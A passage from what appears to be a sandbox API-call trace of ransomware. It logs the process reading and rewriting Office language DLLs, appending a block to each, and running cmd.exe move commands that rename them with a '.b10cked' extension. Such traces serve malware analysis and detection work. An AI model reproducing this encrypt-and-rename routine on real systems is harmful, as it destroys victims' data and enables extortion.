lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX") returned 0x3c [0158.664] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.666] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, 
lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf80, dwThreadId=0x8b0)) returned 1 [0158.671] CloseHandle (hObject=0x1b4) returned 1 [0158.671] CloseHandle (hObject=0x114) returned 1 [0158.672] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.672] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.672] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.672] ReleaseMutex (hMutex=0xf8) returned 1 [0158.672] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" 
(normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21546661721) returned 1 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.677] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.678] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4160 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.679] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3c78 [0158.679] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4160 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4160 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.747] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x20af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x20af, lpOverlapped=0x0) returned 1 [0158.755] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.755] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x20af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0x20af, lpOverlapped=0x0) returned 1 [0158.756] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8367, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x20b1 [0158.756] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x20af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x20af, lpOverlapped=0x0) returned 1 [0158.756] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8367, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x20b1 [0158.756] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x20af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x20af, lpOverlapped=0x0) returned 1 [0158.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0158.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0158.760] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4160 [0158.760] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.760] CloseHandle (hObject=0x114) returned 1 [0158.783] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX") returned 0x3c [0158.784] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.785] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf48, dwThreadId=0x320)) returned 1 [0158.870] CloseHandle (hObject=0x1b4) returned 1 [0158.870] CloseHandle (hObject=0x114) returned 1 [0158.870] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.870] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.870] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.870] ReleaseMutex (hMutex=0xf8) returned 1 [0158.870] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.961] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21575269720) returned 1 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6478 [0158.965] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6960 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6960 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.377] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.377] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x34af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x34af, lpOverlapped=0x0) returned 1 [0159.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x34af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x34af, lpOverlapped=0x0) 